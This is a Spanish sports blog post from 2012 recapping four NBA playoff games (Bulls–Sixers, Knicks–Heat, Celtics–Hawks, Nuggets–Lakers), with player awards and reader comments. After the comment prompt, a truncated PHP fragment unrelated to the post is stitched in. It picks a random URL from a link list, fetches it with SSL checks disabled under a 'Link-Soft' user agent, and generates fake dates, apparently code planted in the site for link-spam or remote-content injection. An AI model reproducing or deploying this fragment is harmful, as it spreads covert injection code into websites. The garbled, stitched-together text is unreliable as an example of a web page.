La Crónica: La batalla contra los elementos

06 de May de 2012 por MagicJohnson32

Cuatro partidos se jugaron el domingo, y los cuatro resultados supusieron el 3-1 para sus respectivas series. Los repasamos por orden cronológico.

En el partido que inauguraba la jornada dominical, los Bulls combatieron hasta el último aliento en una batalla contra los Sixers y contra los elementos. Philadelphia sacó provecho de las ausencias de Derrick Rose y Joakim Noah, y en el tramo final se vio beneficiado por un arbitraje tan permisivo bajo su aro como severo en el lado opuesto de la pista. Hasta ese momento el partido había transitado con ventajas mínimas para ambos equipos, con Boozer y Hawes como los hombres más acertados para sus respectivas escuadras. El despertar de Holiday en la segunda mitad, tras una primera parte nefasta, pareció dar a los Sixers el impulso necesario. Dos triples suyos pusieron el marcador 73-80 a 3:30 de la conclusión, a lo que los Bulls respondieron por medio de Boozer y Watson para ajustar de nuevo el tanteo. Las últimas jugadas estuvieron marcadas por un muy discutible criterio arbitral. A base de tiros libres, los Sixers sellaron la victoria (82-89) que les coloca a un solo triunfo de superar ronda por primera vez desde los Playoffs 2003.

Tampoco están teniendo los Knicks la mejor de las fortunas. Por eso hay que reconocerles el mérito que supone ganarles un partido a los Heat (87-89) y llevar la serie de vuelta a Florida. Baron Davis se dislocó la rótula y, como le ocurriese a Shumpert la semana pasada, dice adiós a la temporada. Si Lin está mínimamente sano, jugará el miércoles. Ante la amenaza de eliminación, hicieron falta el Carmelo demoledor de las mejores ocasiones y un Amaré herido en su orgullo tras el célebre episodio del extintor. Entre ambos prácticamente igualaron la aportación del Big Three rival, que no anduvo especialmente brillante. El partido transcurrió igualado y con más emoción que buen juego, quitando de los fogonazos de genialidad de Melo, Wade y LeBron. Fue Anthony, con 12 de sus 41 puntos en los últimos 6 minutos, quien decantó la balanza, pese a que tres fallos por su parte desde el tiro libre y otros dos de Stoudemire dieron a los Heat una última oportunidad. No la jugó bien Wade, que se enredó y acabó lanzando (y fallando) un triple. El triunfo sirve para dejar en 13 la racha de derrotas consecutivas de los Knicks en Playoffs y dar a NY su primera victoria en postemporada desde 2001.

En Boston, los Hawks se vieron atropellados por los locales desde el salto inicial. Rondo ofreció una clase magistral de dirección, a la cual añadió una inusual confianza en su tiro. Regresaban Josh Smith tras un partido y Al Horford después de perderse casi toda la temporada, pero nada de eso importó. Ante la avalancha encabezada por Rondo y Pierce, los Hawks protagonizaron una de esas desapariciones colectivas que acostumbran a ofrecer en Playoffs. El partido estaba resuelto mucho antes de llegar al descanso y los 22 puntos de diferencia del marcador final (79-101) habrían sido muchos más de no ser por la inoperancia de los suplentes en el último cuarto. La serie viaja a Atlanta con 3-1 para los Celtics.

Por último, Nuggets y Lakers disputaron el primer encuentro verdaderamente igualado de la serie. Gallinari y Miller lideraron a los locales, mientras que Jordan Hill se sumó al trío estelar visitante, tan productivo como de  costumbre. La victoria, sin embargo, cayó del lado californiano gracias a dos triples de Sessions y Blake, que sirvieron para romper el empate a 86 con el que se llegó al último minuto. El 92-88 final deja la serie a punto para que los Lakers la finiquiten el martes, cuando el Staples acogerá el quinto partido.

Pese a la emoción y la trascendencia del resultado, el Lakers-Nuggets será probablemente recordado por esto:

PREMIOS

MVP: Dos maneras de entender el baloncesto. Por un lado, los 41 puntos de Carmelo Anthony, y por el otro, las 16 asistencias de Rajon Rondo (que complementó con 20 puntos). A pesar de las diferencias, ambas dieron la victoria a sus respectivos equipos.

Rookie: Jugó Kenneth Faried como acostumbra aunque esta vez el resultado no fue tan brillante. De todas maneras, 6 puntos, 7 rebotes y 3 tapones para el de los Nuggets.

Sorpresa: A Taj Gibson le tocó disputar minutos y respondió con 14 puntos, 12 rebotes y 4 tapones.

Decepción: Prácticamente ningún jugador de Atlanta se salvó de la quema anoche. Hace una semana, los Hawks iban a comerse el mundo tras ganar el primer partido y jugar el segundo frente unos Celtics sin Rondo. Hoy…

Esfuerzo en vano: Ante las bajas de Derrick Rose y Joakim Noah, Carlos Boozer no pudo esconderse más. Con 23 puntos, 11 rebotes y 4 asistencias fue el mejor de los Bulls.

Comenta

15 comentarios a esta entrada

  1. nba dice:
    #1

    Bueno respecto a Lakers, ninguna sorpresa, esperemos que en el siguiente en el Staples, Brown haga mas uso de mas gente en la rotacion , para que el Big-three llegue descansado al enfrentamiento contra OKC.
    Respecto al futuro enfrentamiento contra OKC, la unica manera de que no sea un paseo militar para OKC es, que tanto Sessions-Blake-Goudelock defiendan algo a Westbrook , solo un poco, no les pido que lo anulen, sino sera un 4-0 en toda regla.
    Boston, boston , esto es un equipo, que si viejos, que si no tienen banquillo, parece que van a pasar y no creo que tengan muchos apuros en eliminar a Sixers , ya que a Bulls parece que les ha mirado un tuerto, cambiara Rose su manera de jugar?, ya que las lesiones parece que indican que jugando asi no va a durar mucho tiempo sano.
    Respecto a Rondo, que decir …, lastima que no acabase en Lakers, a cambio de Pau.

      Citar

  2. MagicJohnson32 dice:
    #2

    nba:
    Bueno respecto a Lakers, ninguna sorpresa, esperemos que en el siguiente en el Staples, Brown haga mas uso demas gente en la rotacion , para que el Big-three llegue descansado al enfrentamiento contra OKC.
    Respecto al futuro enfrentamiento contra OKC,la unica manera de que no sea un paseo militar para OKC es, que tanto Sessions-Blake-Goudelock defiendan algo a Westbrook , solo un poco, no les pido que lo anulen, sino sera un 4-0 en toda regla.
    Boston, boston , esto es un equipo, que si viejos, que si no tienen banquillo, parece que van a pasar y no creo que tengan muchos apuros en eliminar a Sixers , ya que a Bulls parece que les ha mirado un tuerto, cambiara Rose su manera de jugar?, ya que las lesiones parece que indican que jugando asi no va a durar mucho tiempo sano.
    Respecto a Rondo, que decir …, lastima que no acabase en Lakers, a cambio de Pau.

    En el último encuentro de RS entre Lakers y Thunder, fue Kobe quien defendió a Westbrook todo el partido, y lo hizo de escándalo (lo dejó en un 3 de 22 en tiros).

    Por cierto, tiene su punto de ironía que cuanto más se le alargue a los Lakers la serie contra Denver, más partidos podrá jugar MWP contra los Thunder. Le quedan por cumplir dos partidos de su sanción.

      Citar

  3. simon dice:
    #3

    MagicJohnson32:

    Por cierto, tiene su punto de ironía que cuanto más se le alargue a los Lakers la serie contra Denver, más partidos podrá jugar MWP contra los Thunder. Le quedan por cumplir dos partidos de su sanción.

    Sabes? ayer lo pensaba, viendo lo superiores que son los Lakers y viendolos jugar al trantran pensé… no será que estan intentando alargar ( un poquito ) la serie para que MWP no se pierda muchos partidos de la serie contra OKC??? jajajjajaj

      Citar

  4. Toni dice:
    #4

    Yo creo que es bastante obvio lo de Artest viendo que Ebanks no puede ni frenar a Gallinari.
    Tengo muchas ganas de ver la serie OKC-LAL, porque en la zona se va a repartir estopa de la buena, se antoja una eliminatoria preciosa.

    Por el Este, ayer a Wade se le engarrotó la mano tanto para tirar como para asistir a Bosh después del primer bloqueo que éste le realiza en la última posesión. Por otro lado, Melo asombroso con ese triplazo a falta de 1 minuto. El factor diferencial de que los Knicks alarguen su agonía puede ser la vuelta de Lin.

    Por cierto, enhorabuena por estas crónicas que cuando parecía que mejorar era complicado, os habeis puesto en playoff mode y os habeis superado.

      Citar

  5. nba dice:
    #5

    Yo creo que MWP volvera para los partidos en el Staples , no creo que Brown sea tan timorato de poner en los partidos en Oklahoma ,en el caso de que pueda contar con MWP, ya lo que les faltaba, para hacer una barrida a Lakers, mas motivacion si cabe.
    Ya recuerdo que Bryant defendio a Westbrook , pero probablemente en la serie cuando esten en pista Westbrook-Harden-Durant-Ibaka-Perkins , no quedara otra que por una vez los bases de los Lakers defiendan algo

      Citar

  6. Esteban dice:
    #6

    metta se perderia los dos primeros juegos de la serie frente al thunder no?
    mal que me pese, lo necesitan, sobretodo si puede seguir anotando esos triples, los lakers solo tienen 4 jugadores capaz q meter la bola en el aro, sessions y el big 3, ahora se le suma hill, y deberia sumarse metta

    parrafo aparte lo de jordan hill, impresionante 12 puntos y 11 rebotes en 23 munutos, ni odom respondia asi

      Citar

  7. HisRoyalAirness dice:
    #7

    Yo os veo a todos muy convencidos con los Thunder y parece que os olvidais de la pintura. Si Brown espabila y manda meter balones dentro y hace que Pau no esté abierto en el triple y se meta en el poste bajo pueden ser una pesadilla para OKC. Jugando por dentro pueden sacar a Ibaka por faltas en el segundo cuarto.
    El que va a defender a Durant en un principio yo creo que va a ser Barnes, que intentará darle el coñazo con mucho trash talk y juego físico.
    Y lo de las penetraciones de Westbrook, en fin… No es lo mismo hacerlo contra Haywood que contra Gasol-Bynum.
    Eso sí, los Lakers que se olviden de pasar la eliminatoria con Pau tirando un tiro libre en un partido, como en el último en Denver.

      Citar

  8. nba dice:
    #8

    Bueno Royal, todos sabemos que la unica manera de que Lakers gane a OKC es que surtan de balones al juego interior y que Kobe este minimante acertado, ya que en la serie contra Denver, como se esta viendo y a pesar de que los Nuggets no tienen un juego interior excesivamente potente , los jugadores exteriores de Lakers no estan haciendo uso de esta ventaja y prefieren obcecarse en tirar ellos aunque sean con malos porcentajes,
    habria que repasar el numero de tiros de los que disponen Pau-BynumHill.

      Citar

  9. Nacho dice:
    #9

    HisRoyalAirness:
    Yo os veo a todos muy convencidos con los Thunder y parece que os olvidais de la pintura. Si Brown espabila y manda meter balones dentro y hace que Pau no esté abierto en el triple y se meta en el poste bajo pueden ser una pesadilla para OKC. Jugando por dentro pueden sacar a Ibaka por faltas en el segundo cuarto.
    El que va a defender a Durant en un principio yo creo que va a ser Barnes, que intentará darle el coñazo con mucho trash talk y juego físico.
    Y lo de las penetraciones de Westbrook, en fin… No es lo mismo hacerlo contra Haywood que contraGasol-Bynum.
    Eso sí, los Lakers que se olviden de pasar la eliminatoria con Pau tirando un tiro libre en un partido, como en el último en Denver.

    Los Lakers tienen equipo para pasar la eliminatoria. Lo que no tienen es entrenador para ello. Pedirle a Brown que espabile y saque a Pau de la esquina es pedir peras al olmo. Ayer quedó demostrado. Aparte de que alguien del staff técnico debería decirle a Bynum que no pasa nada por doblar la bola, ayer me sacó de quicio, y en la banca de Los Ángeles como si lloviera. En fin, malos augurios para el equipo y para Pau (si se queda) si sigue ese gañán.

      Citar

  10. Esteban dice:
    #10

    Yo a estas alturas ya no confio en brown, ni creo q espabile en segunda ronda, el juego de los lakers es horrible, o es kobe o sessions forzando una penetracion o tiro, o es bola a bynum para q se las arregle

    Solo parece un equipo con sessions de 2 y barnes de 3 moviendo la bola hasta el tirador mejor ubicado

    Pau deberia ser la primer carta, primer pase en ofensiva, el puede pasar sobre la doble marca cosa q bynum no
    Y por otro lado bynum es temible cargando al rebote ofensivo, cosa q pau no

    Y como dije necesitan al metta de fin de la regular donde ensayo un tiro de 3 confiable, sino no tiene tiradores ese equipo

      Citar

  11. rumbero dice:
    #11

    En twitter hablan

      Citar

  12. rumbero dice:
    #12

    (A ver ahora) En twitter hablan de 12 meses para la recuperacion de Davis. Tiene los ligamentos tocados. Me da que igual no lo vemos mas en una cancha…

      Citar

  13. Txusma dice:
    #13

    rumbero:
    En twitter hablan

    Y no solo hablan sinó que no callan… 😀

      Citar

  14. GreenPride dice:
    #14

    Bueno pues repasando los partidos del domingo.
    Los Lakers sacaron adelante el partido como esperaba. Los Nuggets jugaron a machacarlos físicamente a base de un ritmo super-rápido pero esta vez los Lakers fueron capaces de controlar mucho mejor los tableros y con ello impidieron la mayoría de los grandes problemas del tercer partido. Aún así necesitaron un par de triples salvadores en el último minuto para cerrar el partido y con él la serie que casi seguro terminará en el quinto.
    De cara a su enfrentamiento con OKC, creo que Kobe debería defender a Harden en los minutos decisivos y no a Westbrook ya que Harden el jugador decisivo junto a Durant de los de Oklahoma. Además no olvidemos que si Kobe se machaca todo el partido en defensa esto le pasará factura en ataque. Yo apostaría por ver si Sessions puede defender a Westbrook de inicio y dejar a Bryant con Harden cuando este entre. En cuanto a las claves, evidentemente las opciones de Lakers pasan por imponerse claramente en la pintura y pueden hacerlo. Si Bynum-Pau-Hill consiguen anotar y que les hagan dobles marcajes los de LA pueden pasar la eliminatoria. Será un duelo de interiores precioso ante grandes defensores como Perkins, Ibaka o Collison. Yo si fuera OKC defendería a Bynum 1×1 o como mucho mandaría alguna ayuda cuando empiece a botar. De Pau no digo nada porque como no le ponen a jugar al poste creo que Ibaka podrá defender sus tiros exteriores. Si Brown recapacitase y le metiese dentro podría hacer mucho más daño pero yo tampoco confío en que lo haga. Y sí, los Lakers van a necesitar al Idiota MWP. Barnes sólo no podrá todo un partido con Durantula así que la defensa de MWP es necesaria para poder pasar. Creo que será una serie igualada y para mí de pronóstico incierto.
    En Boston, paliza paliza paliza. Los Celtics desnudaron a los Hawks y les demostraron cómo se juega con ventajas que llegaron a los 40 puntos. Atlanta como dice la crónica decepcionó como tantas otras veces. A sus jugadores les falta carácter para jugar contra un equipo como Boston y ahora les queda la dificilísima tarea de remontar un 3-1 ante unos verdes que ya huelen sangre. Además si siguen sanos tendrían muchas opciones de llegar a las finales de conferencia a la vista de que a Chicago lo están matando las lesiones y los Sixers tampoco parecen el equipo más fuerte de estos playoffs. Creo que Chicago ganará en casa y veremos que pasa en el 6º en Philly, yo todavía no doy por cerrada esa eliminatoria.
    En cuanto a los Knicks, decir que salvaron el honor. Un partido que durante 3 cuartos fue bastante malo se animó en el último con el duelo Carmelo-LeBron. Al final Melo pudo hacer su primer gran partido de la serie y con la colaboración de Stoudamire (y de Wade en una última jugada horrorosa) sacar adelante el partido. Con Davis ahora también lesionado y el 5º en Miami no espero otra cosa que no sea una victoria fácil de los Heat en el 5º

      Citar

  15. nba dice:
    #15

    Green cuando veas el partido de esta noche que han perdido los Lakers , ya veras como te tiras de los pelos, jaja.
    Parece que esto va a acabar en un 4-3, parece que ya hay final clara en el Oeste Spurs-Okc

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>